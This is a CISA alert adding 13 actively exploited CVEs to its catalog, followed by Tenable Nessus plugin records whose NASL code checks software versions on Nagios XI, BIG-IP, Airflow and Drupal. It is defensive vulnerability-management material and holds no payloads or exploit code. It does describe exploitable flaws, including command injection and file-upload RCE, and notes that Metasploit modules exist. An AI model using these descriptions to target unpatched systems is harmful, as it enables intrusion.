CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.

**CVE Number** | **CVE Title** | **Required Action Due Date**
---|---|---
CVE-2021-32648 | October CMS Improper Authentication | 2/1/2022
CVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022
CVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022
CVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022
CVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022
CVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022
CVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022
CVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022
CVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022
CVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022
CVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022

[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).
This product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.
{"nessus": [{"lastseen": "2023-05-18T14:40:59", "description": "According to the self-reported version of Nagios XI, the remote host may be affected by multiple vulnerabilities, including the following:\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25296).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25297).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25298).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-02-04T00:00:00", "type": "nessus", "title": "Nagios XI 5.7.5 Command Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:nagios:nagios_xi"], "id": "NAGIOSXI_5_7_5_COMMAND_INJECTION.NASL", "href": "https://www.tenable.com/plugins/nessus/157377", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(157377);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-25296\", \"CVE-2021-25297\", \"CVE-2021-25298\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n\n script_name(english:\"Nagios XI 5.7.5 Command Injection\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"The remote host has a web application that may be affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the self-reported version of Nagios XI, the remote host may be affected by multiple vulnerabilities, including\nthe following:\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25296).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25297).\n\n - A command injection vulnerability in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php\n due to improper sanitization of authenticated user-controlled input by a single HTTP request (CVE-2021-25298).\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nagios.com/downloads/nagios-xi/change-log/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.nagios.com/products/security/\");\n script_set_attribute(attribute:\"solution\", value:\n\"See vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-25298\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/04\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:nagios:nagios_xi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"nagios_enterprise_detect.nasl\");\n script_require_keys(\"installed_sw/nagios_xi\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('http_func.inc');\ninclude('vcf_extras.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar app_info = vcf::nagiosxi::get_app_info(port:port);\n\nvar constraints = [\n {'min_version': '5.7.5', 'max_version': '5.7.5.99999', 'fixed_display': 'See vendor advisory'}\n];\n\n# DOn't use the vcf::nagiosxi as we don't want R201* versions to be flagged\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:26:28", "description": "The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 / 16.0.1.1 / 16.1.0. 
It is, therefore, affected by a vulnerability as referenced in the K56715231 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow, resulting in a DoS attack. In certain situations, it may theoretically allow bypass of URL based access control or remote code execution (RCE). Note: Software versions which have reached End of Software Development (EoSD) are not evaluated. (CVE-2021-22991)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-03-10T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : TMM buffer-overflow vulnerability (K56715231)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22991"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL56715231.NASL", "href": "https://www.tenable.com/plugins/nessus/147623", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K56715231.\n#\n# @NOAGENT@\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147623);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n 
script_cve_id(\"CVE-2021-22991\");\n script_xref(name:\"IAVA\", value:\"2021-A-0127\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0017\");\n\n script_name(english:\"F5 Networks BIG-IP : TMM buffer-overflow vulnerability (K56715231)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of F5 Networks BIG-IP installed on the remote host is prior to 12.1.5.3 / 13.1.3.6 / 14.1.4 / 15.1.2.1 /\n16.0.1.1 / 16.1.0. It is, therefore, affected by a vulnerability as referenced in the K56715231 advisory.\n\n - On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before\n 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled\n by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow,\n resulting in a DoS attack. In certain situations, it may theoretically allow bypass of URL based access\n control or remote code execution (RCE). Note: Software versions which have reached End of Software\n Development (EoSD) are not evaluated. 
(CVE-2021-22991)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K56715231\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5 Solution K56715231.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22991\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/10\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude('f5_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar version = get_kb_item('Host/BIG-IP/version');\nif ( ! version ) audit(AUDIT_OS_NOT, 'F5 Networks BIG-IP');\nif ( isnull(get_kb_item('Host/BIG-IP/hotfix')) ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/hotfix');\nif ( ! 
get_kb_item('Host/BIG-IP/modules') ) audit(AUDIT_KB_MISSING, 'Host/BIG-IP/modules');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar sol = 'K56715231';\nvar vmatrix = {\n 'AFM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'APM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'ASM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'AVR': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'GTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LC': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'LTM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n '16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n },\n 'PEM': {\n 'affected': [\n '16.0.0-16.0.1','15.1.0-15.1.2','14.1.0-14.1.3','13.1.0-13.1.3','12.1.0-12.1.5'\n ],\n 'unaffected': [\n 
'16.1.0','16.0.1.1','15.1.2.1','14.1.4','13.1.3.6','12.1.5.3'\n ],\n }\n};\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n var extra = NULL;\n if (report_verbosity > 0) extra = bigip_report_get();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n}\nelse\n{\n var tested = bigip_get_tested_modules();\n var audit_extra = 'For BIG-IP module(s) ' + tested + ',';\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, 'running any of the affected modules');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-01T04:28:29", "description": "The remote host contains a systeminformation npm module that is prior to 5.3.1. It is, therefore, affected by a command injection vulnerability. The System Information Library for Node.JS (npm package 'systeminformation') is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. The vulnerability was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), or si.processLoad()... to only allow strings and reject any arrays. String sanitization works as expected.", "cvss3": {}, "published": "2022-08-10T00:00:00", "type": "nessus", "title": "NodeJS System Information Library Command Injection (CVE-2021-21315)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21315"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:systeminformation:systeminformation"], "id": "NODEJS_CVE-2021-21315.NBIN", "href": "https://www.tenable.com/plugins/nessus/164017", "sourceData": "Binary data nodejs_cve-2021-21315.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:31:25", "description": "The version of Apache Airflow is prior to 1.10.11. 
It is, therefore, affected by multiple vulnerabilities, including the following:\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands. (CVE-2020-11981)\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attack can connect to the broker (Redis, RabbitMQ) directly, it was possible to insert a malicious payload directly to the broker which could lead to a deserialization attack (and thus remote code execution) on the Worker. (CVE-2020-11982)\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable. (CVE-2020-11978)\n\n - The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. 
Note this change fixes it for new installs but existing users need to change their config to default [api]auth_backend = airflow.api.auth.backend.deny_all as mentioned in the Updating Guide:\n https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default (CVE-2020-13927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-13T00:00:00", "type": "nessus", "title": "Apache Airflow < 1.10.11 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11978", "CVE-2020-11981", "CVE-2020-11982", "CVE-2020-11983", "CVE-2020-13927", "CVE-2020-9485"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:apache:airflow"], "id": "APACHE_AIRFLOW_1_10_11.NASL", "href": "https://www.tenable.com/plugins/nessus/162136", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162136);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2020-9485\",\n \"CVE-2020-11978\",\n \"CVE-2020-11981\",\n \"CVE-2020-11982\",\n \"CVE-2020-11983\",\n \"CVE-2020-13927\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Apache Airflow < 1.10.11 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is missing a vendor-supplied update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Airflow is prior to 1.10.11. It is, therefore, affected by multiple vulnerabilities, including\nthe following:\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. 
When using CeleryExecutor, if an attacker\n can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the\n celery worker running arbitrary commands. (CVE-2020-11981)\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attack\n can connect to the broker (Redis, RabbitMQ) directly, it was possible to insert a malicious payload\n directly to the broker which could lead to a deserialization attack (and thus remote code execution) on\n the Worker. (CVE-2020-11982)\n\n - An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection\n vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any\n authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on\n the executor in use). If you already have examples disabled by setting load_examples=False in the config\n then you are not vulnerable. (CVE-2020-11978)\n\n - The previous default setting for Airflow's Experimental API was to allow all API requests without\n authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the\n default has been changed to deny all requests by default and is documented at\n https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. 
Note this change fixes it for\n new installs but existing users need to change their config to default\n [api]auth_backend = airflow.api.auth.backend.deny_all as mentioned in the Updating Guide:\n https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default\n (CVE-2020-13927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.apache.org/thread/mq1bpqf3ztg1nhyc5qbrjobfrzttwx1d\");\n # https://airflow.apache.org/docs/apache-airflow/2.3.1/release_notes.html#airflow-1-10-11-2020-07-10\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?152f8770\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Airflow version 1.10.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13927\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:airflow\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_airflow_web_api_detect.nbin\");\n script_require_keys(\"installed_sw/Apache Airflow\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:8080);\nvar app_info = vcf::get_app_info(app:'Apache Airflow', port:port, webapp:TRUE);\nvar constraints = [{ 'fixed_version': '1.10.11'}];\n\nvcf::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:22", "description": "According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.74, 8.x prior to 8.8.11, 8.9.x prior to 8.9.9, or 9.0.x prior to 9.0.8. It is, therefore, affected by a remote code execution vulnerability in its file upload functionality due to a failure to sanitize filenames. 
An authenticated, remote attacker can exploit this to execute arbitrary php code under certain hosting configurations.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-11-20T00:00:00", "type": "nessus", "title": "Drupal 7.x < 7.74 / 8.x < 8.8.11 / 8.9.x < 8.9.9 / 9.0.x < 9.0.8 RCE (SA-CORE-2020-012)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-13671"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_9_0_8.NASL", "href": "https://www.tenable.com/plugins/nessus/143126", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143126);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-13671\");\n script_xref(name:\"IAVA\", value:\"2020-A-0541-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n\n script_name(english:\"Drupal 7.x < 7.74 / 8.x < 8.8.11 / 8.9.x < 8.9.9 / 9.0.x < 9.0.8 RCE (SA-CORE-2020-012)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the instance of Drupal running on the remote web server is 7.x prior to 7.74,\n8.x prior to 8.8.11, 8.9.x prior to 8.9.9, or 9.0.x prior to 9.0.8. It is, therefore, affected by a remote code \nexecution vulnerability in its file upload functionality due to a failure to sanitize filenames. 
An authenticated, \nremote attacker can exploit this to execute arbitrary php code under certain hosting configurations.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/sa-core-2020-012\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/7.74\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.8.11\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/8.9.9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/project/drupal/releases/9.0.8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Drupal version 7.74 / 8.8.11 / 8.9.9 / 9.0.8 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13671\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_set_attribute(attribute:\"stig_severity\", 
